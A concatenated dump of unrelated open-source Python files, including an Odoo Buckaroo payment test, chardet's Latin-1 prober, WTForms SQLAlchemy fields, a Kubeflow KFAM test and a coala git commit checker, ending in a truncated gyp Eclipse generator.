urlparse.urljoin(self.base_url, BuckarooController._reject_url), 'Brq_culture': 'en-US', } # render the button res = 
self.payment_acquirer.render( cr, uid, self.buckaroo_id, 'SO004', 2240.0, self.currency_euro_id, partner_id=None, partner_values=self.buyer_values, context=context) # check form result tree = objectify.fromstring(res) self.assertEqual(tree.get('action'), 'https://testcheckout.buckaroo.nl/html/', 'Buckaroo: wrong form POST url') for form_input in tree.input: if form_input.get('name') in ['submit']: continue self.assertEqual( form_input.get('value'), form_values[form_input.get('name')], 'Buckaroo: wrong value for input %s: received %s instead of %s' % (form_input.get('name'), form_input.get('value'), form_values[form_input.get('name')]) ) # ---------------------------------------- # Test2: button using tx + validation # ---------------------------------------- # create a new draft tx tx_id = self.payment_transaction.create( cr, uid, { 'amount': 2240.0, 'acquirer_id': self.buckaroo_id, 'currency_id': self.currency_euro_id, 'reference': 'SO004', 'partner_id': self.buyer_id, }, context=context ) # render the button res = self.payment_acquirer.render( cr, uid, self.buckaroo_id, 'should_be_erased', 2240.0, self.currency_euro, tx_id=tx_id, partner_id=None, partner_values=self.buyer_values, context=context) # check form result tree = objectify.fromstring(res) self.assertEqual(tree.get('action'), 'https://testcheckout.buckaroo.nl/html/', 'Buckaroo: wrong form POST url') for form_input in tree.input: if form_input.get('name') in ['submit']: continue self.assertEqual( form_input.get('value'), form_values[form_input.get('name')], 'Buckaroo: wrong value for form input %s: received %s instead of %s' % (form_input.get('name'), form_input.get('value'), form_values[form_input.get('name')]) ) @mute_logger('openerp.addons.payment_buckaroo.models.buckaroo', 'ValidationError') def test_20_buckaroo_form_management(self): cr, uid, context = self.cr, self.uid, {} # be sure not to do stupid thing buckaroo = self.payment_acquirer.browse(self.cr, self.uid, self.buckaroo_id, None) 
self.assertEqual(buckaroo.environment, 'test', 'test without test environment') # typical data posted by buckaroo after client has successfully paid buckaroo_post_data = { 'BRQ_RETURNDATA': u'', 'BRQ_AMOUNT': u'2240.00', 'BRQ_CURRENCY': u'EUR', 'BRQ_CUSTOMER_NAME': u'Jan de Tester', 'BRQ_INVOICENUMBER': u'SO004', 'BRQ_PAYMENT': u'573311D081B04069BD6336001611DBD4', 'BRQ_PAYMENT_METHOD': u'paypal', 'BRQ_SERVICE_PAYPAL_PAYERCOUNTRY': u'NL', 'BRQ_SERVICE_PAYPAL_PAYEREMAIL': u'fhe@openerp.com', 'BRQ_SERVICE_PAYPAL_PAYERFIRSTNAME': u'Jan', 'BRQ_SERVICE_PAYPAL_PAYERLASTNAME': u'Tester', 'BRQ_SERVICE_PAYPAL_PAYERMIDDLENAME': u'de', 'BRQ_SERVICE_PAYPAL_PAYERSTATUS': u'verified', 'BRQ_SIGNATURE': u'175d82dd53a02bad393fee32cb1eafa3b6fbbd91', 'BRQ_STATUSCODE': u'190', 'BRQ_STATUSCODE_DETAIL': u'S001', 'BRQ_STATUSMESSAGE': u'Transaction successfully processed', 'BRQ_TEST': u'true', 'BRQ_TIMESTAMP': u'2014-05-08 12:41:21', 'BRQ_TRANSACTIONS': u'D6106678E1D54EEB8093F5B3AC42EA7B', 'BRQ_WEBSITEKEY': u'5xTGyGyPyl', } # should raise error about unknown tx with self.assertRaises(ValidationError): self.payment_transaction.form_feedback(cr, uid, buckaroo_post_data, 'buckaroo', context=context) tx_id = self.payment_transaction.create( cr, uid, { 'amount': 2240.0, 'acquirer_id': self.buckaroo_id, 'currency_id': self.currency_euro_id, 'reference': 'SO004', 'partner_name': 'Norbert Buyer', 'partner_country_id': self.country_france_id, }, context=context ) # validate it self.payment_transaction.form_feedback(cr, uid, buckaroo_post_data, 'buckaroo', context=context) # check state tx = self.payment_transaction.browse(cr, uid, tx_id, context=context) self.assertEqual(tx.state, 'done', 'Buckaroo: validation did not put tx into done state') self.assertEqual(tx.buckaroo_txnid, buckaroo_post_data.get('BRQ_TRANSACTIONS'), 'Buckaroo: validation did not update tx payid') # reset tx tx.write({'state': 'draft', 'date_validate': False, 'buckaroo_txnid': False}) # now buckaroo post is ok: try to modify 
the SHASIGN buckaroo_post_data['BRQ_SIGNATURE'] = '54d928810e343acf5fb0c3ee75fd747ff159ef7a' with self.assertRaises(ValidationError): self.payment_transaction.form_feedback(cr, uid, buckaroo_post_data, 'buckaroo', context=context) # simulate an error buckaroo_post_data['BRQ_STATUSCODE'] = 2 buckaroo_post_data['BRQ_SIGNATURE'] = '4164b52adb1e6a2221d3d8a39d8c3e18a9ecb90b' self.payment_transaction.form_feedback(cr, uid, buckaroo_post_data, 'buckaroo', context=context) # check state tx = self.payment_transaction.browse(cr, uid, tx_id, context=context) self.assertEqual(tx.state, 'error', 'Buckaroo: erroneous validation did not put tx into error state')
fvcproductions/dotfiles
refs/heads/master
bin/sketch/Plugins/WakaTime.sketchplugin/Contents/Resources/wakatime/packages/requests/packages/chardet/latin1prober.py
1777
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Universal charset detector code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 2001
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
#   Mark Pilgrim - port to Python
#   Shy Shalom - original C code
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301  USA
######################### END LICENSE BLOCK #########################

from .charsetprober import CharSetProber
from .constants import eNotMe
from .compat import wrap_ord

# Number of likelihood categories used by Latin1ClassModel (values 0..3).
FREQ_CAT_NUM = 4

# Character classes assigned to each windows-1252 byte value.
UDF = 0  # undefined
OTH = 1  # other
ASC = 2  # ascii capital letter
ASS = 3  # ascii small letter
ACV = 4  # accent capital vowel
ACO = 5  # accent capital other
ASV = 6  # accent small vowel
ASO = 7  # accent small other
CLASS_NUM = 8  # total classes

# Maps every byte value 0x00-0xFF to one of the classes above.
Latin1_CharToClass = (
    OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH,   # 00 - 07
    OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH,   # 08 - 0F
    OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH,   # 10 - 17
    OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH,   # 18 - 1F
    OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH,   # 20 - 27
    OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH,   # 28 - 2F
    OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH,   # 30 - 37
    OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH,   # 38 - 3F
    OTH, ASC, ASC, ASC, ASC, ASC, ASC, ASC,   # 40 - 47
    ASC, ASC, ASC, ASC, ASC, ASC, ASC, ASC,   # 48 - 4F
    ASC, ASC, ASC, ASC, ASC, ASC, ASC, ASC,   # 50 - 57
    ASC, ASC, ASC, OTH, OTH, OTH, OTH, OTH,   # 58 - 5F
    OTH, ASS, ASS, ASS, ASS, ASS, ASS, ASS,   # 60 - 67
    ASS, ASS, ASS, ASS, ASS, ASS, ASS, ASS,   # 68 - 6F
    ASS, ASS, ASS, ASS, ASS, ASS, ASS, ASS,   # 70 - 77
    ASS, ASS, ASS, OTH, OTH, OTH, OTH, OTH,   # 78 - 7F
    OTH, UDF, OTH, ASO, OTH, OTH, OTH, OTH,   # 80 - 87
    OTH, OTH, ACO, OTH, ACO, UDF, ACO, UDF,   # 88 - 8F
    UDF, OTH, OTH, OTH, OTH, OTH, OTH, OTH,   # 90 - 97
    OTH, OTH, ASO, OTH, ASO, UDF, ASO, ACO,   # 98 - 9F
    OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH,   # A0 - A7
    OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH,   # A8 - AF
    OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH,   # B0 - B7
    OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH,   # B8 - BF
    ACV, ACV, ACV, ACV, ACV, ACV, ACO, ACO,   # C0 - C7
    ACV, ACV, ACV, ACV, ACV, ACV, ACV, ACV,   # C8 - CF
    ACO, ACO, ACV, ACV, ACV, ACV, ACV, OTH,   # D0 - D7
    ACV, ACV, ACV, ACV, ACV, ACO, ACO, ACO,   # D8 - DF
    ASV, ASV, ASV, ASV, ASV, ASV, ASO, ASO,   # E0 - E7
    ASV, ASV, ASV, ASV, ASV, ASV, ASV, ASV,   # E8 - EF
    ASO, ASO, ASV, ASV, ASV, ASV, ASV, OTH,   # F0 - F7
    ASV, ASV, ASV, ASV, ASV, ASO, ASO, ASO,   # F8 - FF
)

# Likelihood of seeing the column's class immediately after the row's class:
# 0 : illegal
# 1 : very unlikely
# 2 : normal
# 3 : very likely
Latin1ClassModel = (
    # UDF OTH ASC ASS ACV ACO ASV ASO
    0, 0, 0, 0, 0, 0, 0, 0,  # UDF
    0, 3, 3, 3, 3, 3, 3, 3,  # OTH
    0, 3, 3, 3, 3, 3, 3, 3,  # ASC
    0, 3, 3, 3, 1, 1, 3, 3,  # ASS
    0, 3, 3, 3, 1, 2, 1, 2,  # ACV
    0, 3, 3, 3, 3, 3, 3, 3,  # ACO
    0, 3, 1, 3, 1, 1, 1, 3,  # ASV
    0, 3, 1, 3, 1, 1, 3, 3,  # ASO
)


class Latin1Prober(CharSetProber):
    """Prober for windows-1252 (a Latin-1 superset).

    Scores the likelihood of each adjacent character-class pair against
    Latin1ClassModel; an illegal pair rules the encoding out entirely.
    """

    def __init__(self):
        CharSetProber.__init__(self)
        self.reset()

    def reset(self):
        # Class of the previously seen character; OTH is the neutral start.
        self._mLastCharClass = OTH
        # Histogram of observed pair likelihoods, indexed by category 0..3.
        self._mFreqCounter = [0] * FREQ_CAT_NUM
        CharSetProber.reset(self)

    def get_charset_name(self):
        return "windows-1252"

    def feed(self, aBuf):
        # Filter out English letters and markup-like runs first, so only
        # the bytes that discriminate between encodings are scored.
        aBuf = self.filter_with_english_letters(aBuf)
        for c in aBuf:
            charClass = Latin1_CharToClass[wrap_ord(c)]
            freq = Latin1ClassModel[(self._mLastCharClass * CLASS_NUM)
                                    + charClass]
            if freq == 0:
                # Illegal class pair: this buffer cannot be windows-1252.
                self._mState = eNotMe
                break
            self._mFreqCounter[freq] += 1
            self._mLastCharClass = charClass

        return self.get_state()

    def get_confidence(self):
        if self.get_state() == eNotMe:
            return 0.01

        total = sum(self._mFreqCounter)
        if total < 0.01:
            confidence = 0.0
        else:
            # "Very likely" pairs raise confidence; "very unlikely" pairs
            # are penalized heavily (x20) since they rarely occur in real
            # Latin-1 text.
            confidence = ((self._mFreqCounter[3] - self._mFreqCounter[1] * 20.0)
                          / total)
        if confidence < 0.0:
            confidence = 0.0
        # lower the confidence of latin1 so that other more accurate
        # detector can take priority.
        confidence = confidence * 0.73
        return confidence
ItsLastDay/academic_university_2016-2018
refs/heads/master
subjects/SoftwareDesign/au-software_design-2017/chat/src/chat_pb2_grpc.py
1
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT! import grpc import chat_pb2 as chat__pb2 class ChatStub(object): def __init__(self, channel): """Constructor. Args: channel: A grpc.Channel. """ self.ChatSession = channel.stream_stream( '/Chat/ChatSession', request_serializer=chat__pb2.ChatMsg.SerializeToString, response_deserializer=chat__pb2.ChatMsg.FromString, ) class ChatServicer(object): def ChatSession(self, request_iterator, context): context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def add_ChatServicer_to_server(servicer, server): rpc_method_handlers = { 'ChatSession': grpc.stream_stream_rpc_method_handler( servicer.ChatSession, request_deserializer=chat__pb2.ChatMsg.FromString, response_serializer=chat__pb2.ChatMsg.SerializeToString, ), } generic_handler = grpc.method_handlers_generic_handler( 'Chat', rpc_method_handlers) server.add_generic_rpc_handlers((generic_handler,))
gmt/portage
refs/heads/master
pym/portage/sync/__init__.py
5
# Copyright 2014-2015 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2

import os

from portage import OrderedDict
from portage.module import Modules
from portage.sync.controller import SyncManager
from portage.sync.config_checks import check_type

# Repository submodules mapped to the paths that identify each of them.
_SUBMODULE_PATH_MAP = OrderedDict([
	('glsa', ('metadata/glsa',)),
	('news', ('metadata/news',)),
	('profiles', ('metadata/layout.conf', 'profiles')),
])

# Discover the sync modules shipped alongside this package.
path = os.path.join(os.path.dirname(__file__), "modules")
module_controller = Modules(path=path, namepath="portage.sync.modules")
module_names = module_controller.module_names[:]


def module_specific_options(repo):
	'''Return the frozenset of authorized module-specific options
	declared by the sync module handling *repo*; empty when the repo
	has no sync type or the module declares no such options.'''
	if not repo.sync_type:
		return frozenset()
	try:
		options = module_controller.modules[repo.sync_type]['module_specific_options']
	except KeyError:
		return frozenset()
	return frozenset(options)


def validate_config(repo, logger):
	'''Validate the repos.conf settings for *repo*; returns a boolean.'''
	# Generic checks first; a bad repo type fails immediately.
	if not check_type(repo, logger, module_names):
		return False
	if not repo.sync_type:
		return True
	# Delegate the detailed checks to the module handling this sync type.
	checker = module_controller.modules[repo.sync_type]['validate_config']
	return checker(repo, logger).repo_checks()
martinwicke/tensorflow
refs/heads/master
tensorflow/contrib/tfprof/python/tools/tfprof/tfprof_logger.py
9
# Copyright 2015 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Logging tensorflow::tfprof::OpLog. OpLog is used to add extra model information for offline analysis by tfprof. """ from __future__ import absolute_import from __future__ import division from __future__ import print_function import os import sys import tensorflow as tf from tensorflow.python.framework import ops from tensorflow.tools.tfprof import tfprof_log_pb2 TRAINABLE_VARIABLES = '_trainable_variables' REGISTERED_FLOP_STATS = 'flops' def _fill_missing_graph_shape(graph, run_meta): """Fill Tensor shapes in 'graph' with run time shape from 'run_meta'.""" for dev_stat in run_meta.step_stats.dev_stats: for node_stat in dev_stat.node_stats: if not node_stat.output: continue try: op = graph.get_operation_by_name(node_stat.node_name) except KeyError as e: # Graph doesn't contains the node_stat, usually RecvTensor. continue if len(node_stat.output) != len(op.outputs): # For example, conditional op has only 1 output at run time. 
continue for (i, node_stat_out) in enumerate(node_stat.output): if op.outputs[i].get_shape().is_fully_defined(): continue node_stat_dims = node_stat_out.tensor_description.shape.dim node_stat_shape = tf.TensorShape([d.size for d in node_stat_dims]) try: op.outputs[i].set_shape(op.outputs[i].get_shape().merge_with( node_stat_shape)) except ValueError as e: sys.stderr.write('Node %s incompatible shapes: %s.\n' % (node_stat.node_name, e)) return graph def _get_logged_ops(graph, run_meta=None): """Extract trainable model parameters and FLOPs for ops from a Graph. Args: graph: tf.Graph. run_meta: RunMetadata proto used to complete shape information. Returns: logged_ops: dict mapping from op_name to OpLogEntry. """ if run_meta: graph = _fill_missing_graph_shape(graph, run_meta) op_missing_shape = 0 logged_ops = {} graph_def = graph.as_graph_def() for node in graph_def.node: try: stats = ops.get_stats_for_node_def(graph, node, REGISTERED_FLOP_STATS) except ValueError: # Catch Exception When shape is incomplete. Skip it. op_missing_shape += 1 stats = None if not stats or not stats.value: continue if node.name not in logged_ops: entry = tfprof_log_pb2.OpLogEntry() entry.name = node.name entry.float_ops = int(stats.value) logged_ops[entry.name] = entry for v in graph.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES): if v.op.name not in logged_ops: entry = tfprof_log_pb2.OpLogEntry() entry.name = v.op.name entry.types.append(TRAINABLE_VARIABLES) logged_ops[entry.name] = entry else: logged_ops[v.op.name].types.append(TRAINABLE_VARIABLES) if op_missing_shape > 0 and not run_meta: sys.stderr.write( '%d ops no flops stats due to incomplete shapes. ' 'Consider passing run_meta to use run_time shapes.\n' % op_missing_shape) return logged_ops def _merge_default_with_oplog(graph, op_log=None, run_meta=None): """Merge the tfprof default extra info with caller's op_log. Args: graph: tf.Graph. op_log: OpLog proto. run_meta: RunMetadata proto used to complete shape information. 
Returns: tmp_op_log: Merged OpLog proto. """ tmp_op_log = tfprof_log_pb2.OpLog() logged_ops = _get_logged_ops(graph, run_meta) if not op_log: tmp_op_log.log_entries.extend(logged_ops.values()) else: all_ops = dict() for entry in op_log.log_entries: all_ops[entry.name] = entry for op_name, entry in logged_ops.iteritems(): if op_name in all_ops: all_ops[op_name].types.extend(entry.types) if entry.float_ops > 0 and all_ops[op_name].float_ops == 0: all_ops[op_name].float_ops = entry.float_ops else: all_ops[op_name] = entry tmp_op_log.log_entries.extend(all_ops.values()) return tmp_op_log def write_op_log(graph, log_dir, op_log=None, run_meta=None): """Log provided 'op_log', and add additional model information below. The API also assigns ops in tf.trainable_variables() an op type called '_trainable_variables'. The API also logs 'flops' statistics for ops with op.RegisterStatistics() defined. flops calculation depends on Tensor shapes defined in 'graph', which might not be complete, 'run_meta', if provided, completes the shape information with best effort. Args: graph: tf.Graph. log_dir: directory to write the log file. op_log: (Optional) OpLog proto to be written. If not provided, an new one is created. run_meta: (Optional) RunMetadata proto that helps flops computation using run time shape information. """ op_log = _merge_default_with_oplog(graph, op_log, run_meta) with tf.gfile.Open(os.path.join(log_dir, 'tfprof_log'), 'w') as log: log.write(op_log.SerializeToString())
xsynergy510x/android_external_chromium_org
refs/heads/cm-12.1
build/android/pylib/gtest/test_options.py
44
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.

"""Defines the GTestOptions named tuple."""

import collections

# Immutable bundle of configuration values for one gtest run; the meaning
# of each field is fixed by the option-parsing code that constructs it.
GTestOptions = collections.namedtuple(
    'GTestOptions',
    'tool cleanup_test_files push_deps gtest_filter run_disabled '
    'test_arguments timeout isolate_file_path suite_name')
ryanmockabee/golfr
refs/heads/master
flask/lib/python3.6/site-packages/wtforms/ext/sqlalchemy/fields.py
177
""" Useful form fields for use with SQLAlchemy ORM. """ from __future__ import unicode_literals import operator from wtforms import widgets from wtforms.compat import text_type, string_types from wtforms.fields import SelectFieldBase from wtforms.validators import ValidationError try: from sqlalchemy.orm.util import identity_key has_identity_key = True except ImportError: has_identity_key = False __all__ = ( 'QuerySelectField', 'QuerySelectMultipleField', ) class QuerySelectField(SelectFieldBase): """ Will display a select drop-down field to choose between ORM results in a sqlalchemy `Query`. The `data` property actually will store/keep an ORM model instance, not the ID. Submitting a choice which is not in the query will result in a validation error. This field only works for queries on models whose primary key column(s) have a consistent string representation. This means it mostly only works for those composed of string, unicode, and integer types. For the most part, the primary keys will be auto-detected from the model, alternately pass a one-argument callable to `get_pk` which can return a unique comparable key. The `query` property on the field can be set from within a view to assign a query per-instance to the field. If the property is not set, the `query_factory` callable passed to the field constructor will be called to obtain a query. Specify `get_label` to customize the label associated with each option. If a string, this is the name of an attribute on the model object to use as the label text. If a one-argument callable, this callable will be passed model instance and expected to return the label text. Otherwise, the model object's `__str__` or `__unicode__` will be used. If `allow_blank` is set to `True`, then a blank choice will be added to the top of the list. Selecting this choice will result in the `data` property being `None`. The label for this blank choice can be set by specifying the `blank_text` parameter. 
""" widget = widgets.Select() def __init__(self, label=None, validators=None, query_factory=None, get_pk=None, get_label=None, allow_blank=False, blank_text='', **kwargs): super(QuerySelectField, self).__init__(label, validators, **kwargs) self.query_factory = query_factory if get_pk is None: if not has_identity_key: raise Exception('The sqlalchemy identity_key function could not be imported.') self.get_pk = get_pk_from_identity else: self.get_pk = get_pk if get_label is None: self.get_label = lambda x: x elif isinstance(get_label, string_types): self.get_label = operator.attrgetter(get_label) else: self.get_label = get_label self.allow_blank = allow_blank self.blank_text = blank_text self.query = None self._object_list = None def _get_data(self): if self._formdata is not None: for pk, obj in self._get_object_list(): if pk == self._formdata: self._set_data(obj) break return self._data def _set_data(self, data): self._data = data self._formdata = None data = property(_get_data, _set_data) def _get_object_list(self): if self._object_list is None: query = self.query or self.query_factory() get_pk = self.get_pk self._object_list = list((text_type(get_pk(obj)), obj) for obj in query) return self._object_list def iter_choices(self): if self.allow_blank: yield ('__None', self.blank_text, self.data is None) for pk, obj in self._get_object_list(): yield (pk, self.get_label(obj), obj == self.data) def process_formdata(self, valuelist): if valuelist: if self.allow_blank and valuelist[0] == '__None': self.data = None else: self._data = None self._formdata = valuelist[0] def pre_validate(self, form): data = self.data if data is not None: for pk, obj in self._get_object_list(): if data == obj: break else: raise ValidationError(self.gettext('Not a valid choice')) elif self._formdata or not self.allow_blank: raise ValidationError(self.gettext('Not a valid choice')) class QuerySelectMultipleField(QuerySelectField): """ Very similar to QuerySelectField with the difference that this 
will display a multiple select. The data property will hold a list with ORM model instances and will be an empty list when no value is selected. If any of the items in the data list or submitted form data cannot be found in the query, this will result in a validation error. """ widget = widgets.Select(multiple=True) def __init__(self, label=None, validators=None, default=None, **kwargs): if default is None: default = [] super(QuerySelectMultipleField, self).__init__(label, validators, default=default, **kwargs) if kwargs.get('allow_blank', False): import warnings warnings.warn('allow_blank=True does not do anything for QuerySelectMultipleField.') self._invalid_formdata = False def _get_data(self): formdata = self._formdata if formdata is not None: data = [] for pk, obj in self._get_object_list(): if not formdata: break elif pk in formdata: formdata.remove(pk) data.append(obj) if formdata: self._invalid_formdata = True self._set_data(data) return self._data def _set_data(self, data): self._data = data self._formdata = None data = property(_get_data, _set_data) def iter_choices(self): for pk, obj in self._get_object_list(): yield (pk, self.get_label(obj), obj in self.data) def process_formdata(self, valuelist): self._formdata = set(valuelist) def pre_validate(self, form): if self._invalid_formdata: raise ValidationError(self.gettext('Not a valid choice')) elif self.data: obj_list = list(x[1] for x in self._get_object_list()) for v in self.data: if v not in obj_list: raise ValidationError(self.gettext('Not a valid choice')) def get_pk_from_identity(obj): cls, key = identity_key(instance=obj) return ':'.join(text_type(x) for x in key)
kubeflow/kfctl
refs/heads/master
py/kubeflow/kfctl/testing/pytests/kfam_test.py
1
import logging
import pytest
from kubeflow.testing import util
import json
from retrying import retry
from time import sleep
import uuid

from kubeflow.kfctl.testing.util import aws_util as kfctl_aws_util


def test_kfam(record_xml_attribute, cluster_name):
    """End-to-end test of the KFAM (profiles) service.

    Creates a profile through the kfam HTTP API (reached via curl from
    inside the jupyter-web-app pod) and verifies that a binding for the
    new profile appears.
    """
    util.set_pytest_junit(record_xml_attribute, "test_kfam_e2e")

    kfctl_aws_util.aws_auth_load_kubeconfig(cluster_name)

    # Locate the jupyter-web-app pod; the go-template prints pod names
    # without decoration, and [1:-1] strips the surrounding quotes from
    # the kubectl output.
    getcmd = "kubectl get pods -n kubeflow -l=app=jupyter-web-app --template '{{range.items}}{{.metadata.name}}{{end}}'"
    jupyterpod = util.run(getcmd.split(' '))[1:-1]

    logging.info("accessing kfam svc from jupyter pod %s" % jupyterpod)

    # Give the kfam service a moment to become reachable before calling it.
    # NOTE(review): fixed sleep; presumably covers service startup — a
    # readiness poll would be more robust.
    sleep(10)

    # Profile Creation: POST a new profile with a random suffix so reruns
    # don't collide.
    profile_name = "testprofile-%s" % uuid.uuid4().hex[0:7]
    util.run(['kubectl', 'exec', jupyterpod, '-n', 'kubeflow', '--',
              'curl', '--silent', '-X', 'POST', '-d',
              '{"metadata":{"name":"%s"},"spec":{"owner":{"kind":"User","name":"user1@kubeflow.org"}}}' % profile_name,
              'profiles-kfam.kubeflow:8081/kfam/v1/profiles'])

    assert verify_profile_creation(jupyterpod, profile_name)


# Poll every 2s for up to 20s until the binding shows up.
@retry(wait_fixed=2000, stop_max_delay=20 * 1000)
def verify_profile_creation(jupyterpod, profile_name):
    """Return True once a binding for *profile_name* is listed by kfam.

    Raises to trigger the @retry decorator while the binding is absent.
    """
    # Verify Profile Creation
    bindingsstr = util.run(['kubectl', 'exec', jupyterpod, '-n', 'kubeflow', '--',
                            'curl', '--silent',
                            'profiles-kfam.kubeflow:8081/kfam/v1/bindings'])
    bindings = json.loads(bindingsstr)
    if profile_name not in [binding['referredNamespace']
                            for binding in bindings['bindings']]:
        raise Exception("testprofile not created yet!")
    return True


if __name__ == "__main__":
    logging.basicConfig(level=logging.INFO,
                        format=('%(levelname)s|%(asctime)s'
                                '|%(pathname)s|%(lineno)d| %(message)s'),
                        datefmt='%Y-%m-%dT%H:%M:%S',
                        )
    logging.getLogger().setLevel(logging.INFO)
    pytest.main()
refeed/coala-bears
refs/heads/master
bears/vcs/git/GitCommitBear.py
1
import os
import shutil
import re

from bears.vcs.CommitBear import _CommitBear
from coala_utils.ContextManagers import change_directory
from coalib.misc.Shell import run_shell_command


class GitCommitBear(_CommitBear):
    LANGUAGES = {'Git'}
    ASCIINEMA_URL = 'https://asciinema.org/a/e146c9739ojhr8396wedsvf0d'

    @classmethod
    def check_prerequisites(cls):
        """Return True when git is installed, otherwise an error string."""
        if shutil.which('git') is None:
            return 'git is not installed.'
        else:
            return True

    @staticmethod
    def get_remotes():
        """Return the raw ``git config`` output listing all remote URLs.

        Bug fix: the original definition sat in the class body without a
        ``self`` parameter and without ``@staticmethod``, so calling it on
        an instance raised ``TypeError`` (the instance was passed as an
        unexpected argument).  ``@staticmethod`` keeps class-level calls
        working and makes instance calls valid too.
        """
        remotes, _ = run_shell_command(
            "git config --get-regex '^remote.*.url$'")
        return remotes

    def get_head_commit(self):
        """Return ``(stdout, stderr)`` of the HEAD commit message lookup.

        Runs inside the configured project directory (or the CWD).  If
        HEAD is a GitHub pull-request temporary merge commit, the message
        of the unmerged parent commit is fetched instead.
        """
        with change_directory(self.get_config_dir() or os.getcwd()):
            command = self.check_github_pull_request_temporary_merge_commit()
            if command:
                return run_shell_command(command)
            return run_shell_command('git log -1 --pretty=%B')

    def check_github_pull_request_temporary_merge_commit(self):
        """
        This function creates a git command to fetch the unmerged parent
        commit shortlog from a commit generated by GitHub in a
        refs/pull/(\\d+)/merge git remote reference.

        Visit https://github.com/travis-ci/travis-ci/issues/8400
        for more details.

        :return:
            A git command (str) to fetch the unmerged parent commit if
            HEAD commit is a GitHub PR temporary merge commit, otherwise
            None.
        """
        stdout, _ = run_shell_command('git log -1 --pretty=%B')
        # First line of the commit message is the shortlog.
        pos = stdout.find('\n')
        shortlog = stdout[:pos] if pos != -1 else stdout
        github_pull_request_temporary_merge_commit_regex = re.compile(
            r'^Merge ([0-9a-f]{40}) into ([0-9a-f]{40})$')
        match = re.fullmatch(
            github_pull_request_temporary_merge_commit_regex, shortlog)
        if match:
            # Group 1 is the PR head (unmerged) commit SHA.
            unmerged_commit_sha = match.group(1)
            command = ('git log -n 1 --pretty=%B ' + unmerged_commit_sha)
            return command
Linkinzoo/H5Exercise
refs/heads/master
Task11_SASS学习/JiKe/node_modules/node-gyp/gyp/pylib/gyp/generator/eclipse.py
1825
# Copyright (c) 2012 Google Inc. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """GYP backend that generates Eclipse CDT settings files. This backend DOES NOT generate Eclipse CDT projects. Instead, it generates XML files that can be imported into an Eclipse CDT project. The XML file contains a list of include paths and symbols (i.e. defines). Because a full .cproject definition is not created by this generator, it's not possible to properly define the include dirs and symbols for each file individually. Instead, one set of includes/symbols is generated for the entire project. This works fairly well (and is a vast improvement in general), but may still result in a few indexer issues here and there. This generator has no automated tests, so expect it to be broken. """ from xml.sax.saxutils import escape import os.path import subprocess import gyp import gyp.common import gyp.msvs_emulation import shlex import xml.etree.cElementTree as ET generator_wants_static_library_dependencies_adjusted = False generator_default_variables = { } for dirname in ['INTERMEDIATE_DIR', 'PRODUCT_DIR', 'LIB_DIR', 'SHARED_LIB_DIR']: # Some gyp steps fail if these are empty(!), so we convert them to variables generator_default_variables[dirname] = '$' + dirname for unused in ['RULE_INPUT_PATH', 'RULE_INPUT_ROOT', 'RULE_INPUT_NAME', 'RULE_INPUT_DIRNAME', 'RULE_INPUT_EXT', 'EXECUTABLE_PREFIX', 'EXECUTABLE_SUFFIX', 'STATIC_LIB_PREFIX', 'STATIC_LIB_SUFFIX', 'SHARED_LIB_PREFIX', 'SHARED_LIB_SUFFIX', 'CONFIGURATION_NAME']: generator_default_variables[unused] = '' # Include dirs will occasionally use the SHARED_INTERMEDIATE_DIR variable as # part of the path when dealing with generated headers. This value will be # replaced dynamically for each configuration. 
generator_default_variables['SHARED_INTERMEDIATE_DIR'] = \ '$SHARED_INTERMEDIATE_DIR' def CalculateVariables(default_variables, params): generator_flags = params.get('generator_flags', {}) for key, val in generator_flags.items(): default_variables.setdefault(key, val) flavor = gyp.common.GetFlavor(params) default_variables.setdefault('OS', flavor) if flavor == 'win': # Copy additional generator configuration data from VS, which is shared # by the Eclipse generator. import gyp.generator.msvs as msvs_generator generator_additional_non_configuration_keys = getattr(msvs_generator, 'generator_additional_non_configuration_keys', []) generator_additional_path_sections = getattr(msvs_generator, 'generator_additional_path_sections', []) gyp.msvs_emulation.CalculateCommonVariables(default_variables, params) def CalculateGeneratorInputInfo(params): """Calculate the generator specific info that gets fed to input (called by gyp).""" generator_flags = params.get('generator_flags', {}) if generator_flags.get('adjust_static_libraries', False): global generator_wants_static_library_dependencies_adjusted generator_wants_static_library_dependencies_adjusted = True def GetAllIncludeDirectories(target_list, target_dicts, shared_intermediate_dirs, config_name, params, compiler_path): """Calculate the set of include directories to be used. Returns: A list including all the include_dir's specified for every target followed by any include directories that were added as cflag compiler options. """ gyp_includes_set = 